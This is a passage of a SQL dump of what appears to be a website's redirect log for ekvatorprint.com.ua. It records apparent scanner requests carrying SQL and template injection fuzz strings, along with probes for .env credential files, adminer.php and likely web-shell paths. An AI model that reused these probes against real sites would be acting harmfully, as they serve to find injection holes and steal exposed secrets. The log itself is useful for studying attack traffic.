00:00:00',301),(24031,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&meta=81x\'\'\"%27\\&id=81x\'\'\"%27\\&deleted=81x\'\'\"%27\\&act=81x\'\'\"%27\\&port=81x\'\'\"%27\\&e=81x\'\'\"%27\\&taxonomy=81x\'\'\"%27\\&ref=81x\'\'\"%27\\&publish=81x\'\'\"%27\\&secret=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24032,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&create=81x\'\'\"%27\\&app=81x\'\'\"%27\\&rememberme=81x\'\'\"%27\\&number=13558667511609261x\'\'\"%27\\&country=81x\'\'\"%27\\&phone=13558667511615891x\'\'\"%27\\&hidden=81x\'\'\"%27\\&force=81x\'\'\"%27\\&export=81x\'\'\"%27\\&sticky=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24033,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cmd=81x\'\'\"%27\\&v=81x\'\'\"%27\\&item=81x\'\'\"%27\\&part=81x\'\'\"%27\\&json=81x\'\'\"%27\\&del=81x\'\'\"%27\\&base=81x\'\'\"%27\\&foo=81x\'\'\"%27\\&y=81x\'\'\"%27\\&info=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24034,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&guid=81x\'\'\"%27\\&dt=81x\'\'\"%27\\&x=81x\'\'\"%27\\&load=81x\'\'\"%27\\&list=81x\'\'\"%27\\&user=81x\'\'\"%27\\&menu=81x\'\'\"%27\\&blog=81x\'\'\"%27\\&link=81x\'\'\"%27\\&end=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24035,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&sid=81x\'\'\"%27\\&feed=81x\'\'\"%27\\&tax=81x\'\'\"%27\\&ss=81x\'\'\"%27\\&gid=81x\'\'\"%27\\&city=81x\'\'\"%27\\&spam=81x\'\'\"%27\\&all=81x\'\'\"%27\\&hh=81x\'\'\"%27\\&nsql=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24036,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&mm=81x\'\'\"%27\\&rsd=81x\'\'\"%27\\&ps=81x\'\'\"%27\\&mn=81x\'\'\"%27\\&jj=81x\'\'\"%27\\&aa=81x\'\'\"%27\\&slug=81x\'\'\"%27\\&o=81x\'\'\"%27\\&note=81x\'\'\"%27\\&l=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24037,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&tid=81x\'\'\"%27\\&form=81x\'\'\"%27\\&down=81x\'\'\"%27\\&val=81x\'\'\"%27\\&mail=u0994@gmail.com1x\'\'\"%27\\&fid=81x\'\'\"%27\\&back=81x\'\'\"%27\\&mod=81x\'\'\"%27\\&img=81x\'\'\"%27\\&hide=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24038,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&auth=81x\'\'\"%27\\&task=81x\'\'\"%27\\&zip=81x\'\'\"%27\\&mid=81x\'\'\"%27\\&next=81x\'\'\"%27\\&main=81x\'\'\"%27\\&js=81x\'\'\"%27\\&lat=81x\'\'\"%27\\&find=81x\'\'\"%27\\&alt=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24039,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&set=81x\'\'\"%27\\&sub=81x\'\'\"%27\\&same=81x\'\'\"%27\\&rows=81x\'\'\"%27\\&aid=81x\'\'\"%27\\&vote=81x\'\'\"%27\\&site=81x\'\'\"%27\\&keys=81x\'\'\"%27\\&dest=81x\'\'\"%27\\&up=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24040,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pos=81x\'\'\"%27\\&kill=81x\'\'\"%27\\&api=81x\'\'\"%27\\&z=81x\'\'\"%27\\&last=81x\'\'\"%27\\&rid=81x\'\'\"%27\\&pg=81x\'\'\"%27\\&ns=81x\'\'\"%27\\&css=81x\'\'\"%27\\&what=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:24','0000-00-00 00:00:00',301),(24041,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&rank=81x\'\'\"%27\\&max=81x\'\'\"%27\\&make=81x\'\'\"%27\\&days=81x\'\'\"%27\\&skin=81x\'\'\"%27\\&done=81x\'\'\"%27\\&root=81x\'\'\"%27\\&go=81x\'\'\"%27\\&dump=81x\'\'\"%27\\&uri=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24042,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pw=81x\'\'\"%27\\&drop=81x\'\'\"%27\\&goto=81x\'\'\"%27\\&st=81x\'\'\"%27\\&skip=81x\'\'\"%27\\&node=81x\'\'\"%27\\&type=81x\'\'\"%27\\&lng=81x\'\'\"%27\\&left=81x\'\'\"%27\\&k=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24043,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&fn=81x\'\'\"%27\\&flag=81x\'\'\"%27\\&copy=81x\'\'\"%27\\&line=81x\'\'\"%27\\&jax=81x\'\'\"%27\\&icon=81x\'\'\"%27\\&dl=81x\'\'\"%27\\&bid=81x\'\'\"%27\\&yes=81x\'\'\"%27\\&run=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24044,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&full=81x\'\'\"%27\\&err=81x\'\'\"%27\\&doit=81x\'\'\"%27\\&ac=81x\'\'\"%27\\&sent=81x\'\'\"%27\\&open=81x\'\'\"%27\\&doc=81x\'\'\"%27\\&args=81x\'\'\"%27\\&inc=81x\'\'\"%27\\&func=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24045,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&read=81x\'\'\"%27\\&post=81x\'\'\"%27\\&nid=81x\'\'\"%27\\&map=81x\'\'\"%27\\&hour=81x\'\'\"%27\\&zoom=81x\'\'\"%27\\&rs=81x\'\'\"%27\\&ok=81x\'\'\"%27\\&mark=81x\'\'\"%27\\&lid=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24046,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&ver=81x\'\'\"%27\\&ts=81x\'\'\"%27\\&row=81x\'\'\"%27\\&raw=81x\'\'\"%27\\&qid=81x\'\'\"%27\\&old=81x\'\'\"%27\\&nick=81x\'\'\"%27\\&lon=81x\'\'\"%27\\&lock=81x\'\'\"%27\\&ext=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24047,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&news=81x\'\'\"%27\\&frob=81x\'\'\"%27\\&area=81x\'\'\"%27\\&aim=81x\'\'\"%27\\&vid=81x\'\'\"%27\\&unit=81x\'\'\"%27\\&opt=81x\'\'\"%27\\&job=81x\'\'\"%27\\&idx=81x\'\'\"%27\\&help=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24048,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cp=81x\'\'\"%27\\&var=81x\'\'\"%27\\&tpl=81x\'\'\"%27\\&top=81x\'\'\"%27\\&sex=81x\'\'\"%27\\&rt=81x\'\'\"%27\\&rate=81x\'\'\"%27\\&get=81x\'\'\"%27\\&box=81x\'\'\"%27\\&age=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24049,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&word=81x\'\'\"%27\\&oid=81x\'\'\"%27\\&mac=81x\'\'\"%27\\&from=81x\'\'\"%27\\&font=81x\'\'\"%27\\&eid=81x\'\'\"%27\\&dst=81x\'\'\"%27\\&demo=81x\'\'\"%27\\&cms=81x\'\'\"%27\\&as=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24050,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&zone=81x\'\'\"%27\\&usr=81x\'\'\"%27\\&to=81x\'\'\"%27\\&ssl=81x\'\'\"%27\\&name=81x\'\'\"%27\\&min=81x\'\'\"%27\\&logo=81x\'\'\"%27\\&by=81x\'\'\"%27\\&bg=81x\'\'\"%27\\&ban=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:25','0000-00-00 00:00:00',301),(24051,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&un=81x\'\'\"%27\\&pic=81x\'\'\"%27\\&mime=81x\'\'\"%27\\&loc=81x\'\'\"%27\\&deny=81x\'\'\"%27\\&yim=81x\'\'\"%27\\&week=81x\'\'\"%27\\&sig=81x\'\'\"%27\\&room=81x\'\'\"%27\\&req=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:26','0000-00-00 00:00:00',301),(24052,'https://ekvatorprint.com.ua/index.php/?state=8\'\'&query=8\'\'&f=8\'\'&error=8\'\'&save=8\'\'&sort=8\'\'&format=8\'\'&tab=8\'\'&offset=8\'\'&edit=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:31','0000-00-00 00:00:00',301),(24053,'https://ekvatorprint.com.ua/index.php/?data=8\'\'&mode=8\'\'&order=8\'\'&lang=8\'\'&p=8\'\'&key=8\'\'&status=8\'\'&start=8\'\'&charset=8\'\'&description=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:31','0000-00-00 00:00:00',301),(24054,'https://ekvatorprint.com.ua/index.php/?preview=8\'\'&filter=8\'\'&update=8\'\'&from=8\'\'&view=8\'\'&a=8\'\'&limit=8\'\'&do=8\'\'&plugin=8\'\'&theme=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:31','0000-00-00 00:00:00',301),(24055,'https://ekvatorprint.com.ua/index.php/?dbname=8\'\'&option=8\'\'&userid=8\'\'&sql=8\'\'&options=8\'\'&address=8\'\'&activated=8\'\'&action2=8\'\'&password2=8\'\'&pass1=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:33','0000-00-00 00:00:00',301),(24056,'https://ekvatorprint.com.ua/index.php/?data=8${{<%[}}%\\&mode=8${{<%[}}%\\&order=8${{<%[}}%\\&lang=8${{<%[}}%\\&p=8${{<%[}}%\\&key=8${{<%[}}%\\&status=8${{<%[}}%\\&start=8${{<%[}}%\\&charset=8${{<%[}}%\\&description=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:37','0000-00-00 00:00:00',301),(24057,'https://ekvatorprint.com.ua/index.php/?state=8${{<%[}}%\\&query=8${{<%[}}%\\&f=8${{<%[}}%\\&error=8${{<%[}}%\\&save=8${{<%[}}%\\&sort=8${{<%[}}%\\&format=8${{<%[}}%\\&tab=8${{<%[}}%\\&offset=8${{<%[}}%\\&edit=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:37','0000-00-00 00:00:00',301),(24058,'https://ekvatorprint.com.ua/index.php/?preview=8${{<%[}}%\\&filter=8${{<%[}}%\\&update=8${{<%[}}%\\&from=8${{<%[}}%\\&view=8${{<%[}}%\\&a=8${{<%[}}%\\&limit=8${{<%[}}%\\&do=8${{<%[}}%\\&plugin=8${{<%[}}%\\&theme=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:37','0000-00-00 00:00:00',301),(24059,'https://ekvatorprint.com.ua/index.php/?dbname=8${{<%[}}%\\&option=8${{<%[}}%\\&userid=8${{<%[}}%\\&sql=8${{<%[}}%\\&options=8${{<%[}}%\\&address=8${{<%[}}%\\&activated=8${{<%[}}%\\&action2=8${{<%[}}%\\&password2=8${{<%[}}%\\&pass1=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:40','0000-00-00 00:00:00',301),(24060,'https://ekvatorprint.com.ua/index.php/?data=81x\'\'\"%27\\&mode=81x\'\'\"%27\\&order=81x\'\'\"%27\\&lang=81x\'\'\"%27\\&p=81x\'\'\"%27\\&key=81x\'\'\"%27\\&status=81x\'\'\"%27\\&start=81x\'\'\"%27\\&charset=81x\'\'\"%27\\&description=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:44','0000-00-00 00:00:00',301),(24061,'https://ekvatorprint.com.ua/index.php/?preview=81x\'\'\"%27\\&filter=81x\'\'\"%27\\&update=81x\'\'\"%27\\&from=81x\'\'\"%27\\&view=81x\'\'\"%27\\&a=81x\'\'\"%27\\&limit=81x\'\'\"%27\\&do=81x\'\'\"%27\\&plugin=81x\'\'\"%27\\&theme=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:44','0000-00-00 00:00:00',301),(24062,'https://ekvatorprint.com.ua/index.php/?state=81x\'\'\"%27\\&query=81x\'\'\"%27\\&f=81x\'\'\"%27\\&error=81x\'\'\"%27\\&save=81x\'\'\"%27\\&sort=81x\'\'\"%27\\&format=81x\'\'\"%27\\&tab=81x\'\'\"%27\\&offset=81x\'\'\"%27\\&edit=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:44','0000-00-00 00:00:00',301),(24063,'https://ekvatorprint.com.ua/index.php/?dbname=81x\'\'\"%27\\&option=81x\'\'\"%27\\&userid=81x\'\'\"%27\\&sql=81x\'\'\"%27\\&options=81x\'\'\"%27\\&address=81x\'\'\"%27\\&activated=81x\'\'\"%27\\&action2=81x\'\'\"%27\\&password2=81x\'\'\"%27\\&pass1=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:46','0000-00-00 00:00:00',301),(24064,'https://ekvatorprint.com.ua/index.php/',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',7,0,'2022-07-22 04:03:49','0000-00-00 00:00:00',301),(24065,'https://ekvatorprint.com.ua/index.php?option=1x\'\'\"%27${{<%[}}%\\com_search',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527${{ource=1x%27\'\"%2527${{1x%27\'\"%2527${{ium=1x%27\'\"%2527${{=1x%27\'\"%2527${{','',2,0,'2022-07-22 04:03:56','0000-00-00 00:00:00',301),(24066,'https://ekvatorprint.com.ua/index.php?option=1x\\com_search',NULL,'https://ekvatorprint.com.ua/t?r=1x\\&utm_source=1x\\&_utm_source=1x\\&_utm_campaign=1x\\&_utm_medium=1x\\&_utm_content=1x\\','',2,0,'2022-07-22 04:03:56','0000-00-00 00:00:00',301),(24067,'https://ekvatorprint.com.ua/index.php?option=com_search&state=8\'\'&query=8\'\'&f=8\'\'&error=8\'\'&save=8\'\'&sort=8\'\'&format=8\'\'&tab=8\'\'&offset=8\'\'&edit=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:58','0000-00-00 00:00:00',301),(24068,'https://ekvatorprint.com.ua/index.php?option=com_search&dbname=8\'\'&option=8\'\'&userid=8\'\'&sql=8\'\'&options=8\'\'&address=8\'\'&activated=8\'\'&action2=8\'\'&password2=8\'\'&pass1=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:59','0000-00-00 00:00:00',301),(24069,'https://ekvatorprint.com.ua/index.php?option=com_search&state=8${{<%[}}%\\&query=8${{<%[}}%\\&f=8${{<%[}}%\\&error=8${{<%[}}%\\&save=8${{<%[}}%\\&sort=8${{<%[}}%\\&format=8${{<%[}}%\\&tab=8${{<%[}}%\\&offset=8${{<%[}}%\\&edit=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:04:02','0000-00-00 00:00:00',301),(24070,'https://ekvatorprint.com.ua/index.php?option=com_search&dbname=8${{<%[}}%\\&option=8${{<%[}}%\\&userid=8${{<%[}}%\\&sql=8${{<%[}}%\\&options=8${{<%[}}%\\&address=8${{<%[}}%\\&activated=8${{<%[}}%\\&action2=8${{<%[}}%\\&password2=8${{<%[}}%\\&pass1=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:04:03','0000-00-00 00:00:00',301),(24071,'https://ekvatorprint.com.ua/index.php?option=com_search&state=81x\'\'\"%27\\&query=81x\'\'\"%27\\&f=81x\'\'\"%27\\&error=81x\'\'\"%27\\&save=81x\'\'\"%27\\&sort=81x\'\'\"%27\\&format=81x\'\'\"%27\\&tab=81x\'\'\"%27\\&offset=81x\'\'\"%27\\&edit=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:04:06','0000-00-00 00:00:00',301),(24072,'https://ekvatorprint.com.ua/index.php?option=com_search&dbname=81x\'\'\"%27\\&option=81x\'\'\"%27\\&userid=81x\'\'\"%27\\&sql=81x\'\'\"%27\\&options=81x\'\'\"%27\\&address=81x\'\'\"%27\\&activated=81x\'\'\"%27\\&action2=81x\'\'\"%27\\&password2=81x\'\'\"%27\\&pass1=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:04:07','0000-00-00 00:00:00',301),(24073,'https://ekvatorprint.com.ua/index.php?option=com_search',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',6,0,'2022-07-22 04:04:11','0000-00-00 00:00:00',301),(24074,'https://ekvatorprint.com.ua/js/uploader/upload.php',NULL,'','',1,0,'2022-07-23 05:08:30','0000-00-00 00:00:00',301),(24075,'https://ekvatorprint.com.ua/.env/credentials',NULL,'','',1,0,'2022-07-23 10:23:43','0000-00-00 00:00:00',301),(24076,'https://ekvatorprint.com.ua/env/credentials',NULL,'','',1,0,'2022-07-23 23:02:58','0000-00-00 00:00:00',301),(24077,'https://ekvatorprint.com.ua/production/.env',NULL,'','',2,0,'2022-07-23 23:29:58','0000-00-00 00:00:00',301),(24078,'https://ekvatorprint.com.ua/testing/.env',NULL,'','',2,0,'2022-07-23 23:29:59','0000-00-00 00:00:00',301),(24079,'https://ekvatorprint.com.ua/locally/.env',NULL,'','',2,0,'2022-07-23 23:29:59','0000-00-00 00:00:00',301),(24080,'https://ekvatorprint.com.ua/developer/.env',NULL,'','',2,0,'2022-07-23 23:29:59','0000-00-00 00:00:00',301),(24081,'https://ekvatorprint.com.ua/_profiler',NULL,'','',2,0,'2022-07-23 23:29:59','0000-00-00 00:00:00',301),(24082,'https://ekvatorprint.com.ua/localhost/.env',NULL,'','',2,0,'2022-07-23 23:29:59','0000-00-00 00:00:00',301),(24083,'https://ekvatorprint.com.ua/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'','',1,0,'2022-07-24 06:50:09','0000-00-00 00:00:00',301),(24084,'https://ekvatorprint.com.ua/magento_version',NULL,'','',1,0,'2022-07-24 16:47:34','0000-00-00 00:00:00',301),(24085,'https://ekvatorprint.com.ua/backup/adminer.php',NULL,'','',1,0,'2022-07-29 17:28:19','0000-00-00 00:00:00',301),(24086,'https://ekvatorprint.com.ua/old/adminer.php',NULL,'','',1,0,'2022-07-29 17:28:20','0000-00-00 00:00:00',301),(24087,'https://ekvatorprint.com.ua/admin/adminer.php',NULL,'','',1,0,'2022-07-29 17:28:21','0000-00-00 00:00:00',301),(24088,'https://ekvatorprint.com.ua/env/config',NULL,'','',1,0,'2022-07-31 14:47:53','0000-00-00 00:00:00',301),(24089,'https://ekvatorprint.com.ua/.env/config',NULL,'','',1,0,'2022-08-01 07:00:03','0000-00-00 00:00:00',301),(24090,'https://ekvatorprint.com.ua/windex.php',NULL,'','',1,0,'2022-08-03 04:57:56','0000-00-00 00:00:00',301),(24091,'https://ekvatorprint.com.ua/wp-slicemap.php',NULL,'','',1,0,'2022-08-03 04:57:56','0000-00-00 00:00:00',301),(24092,'https://ekvatorprint.com.ua/slicemap.php',NULL,'','',1,0,'2022-08-03 04:57:57','0000-00-00 00:00:00',301),(24093,'https://ekvatorprint.com.ua/wp-commentin.php',NULL,'','',15,0,'2022-08-03 04:57:57','0000-00-00 00:00:00',301),(24094,'https://ekvatorprint.com.ua/wikiindex.php',NULL,'','',1,0,'2022-08-03 04:57:57','0000-00-00 00:00:00',301),(24095,'https://ekvatorprint.com.ua/wp-stream.php',NULL,'','',2,0,'2022-08-03 04:57:58','0000-00-00 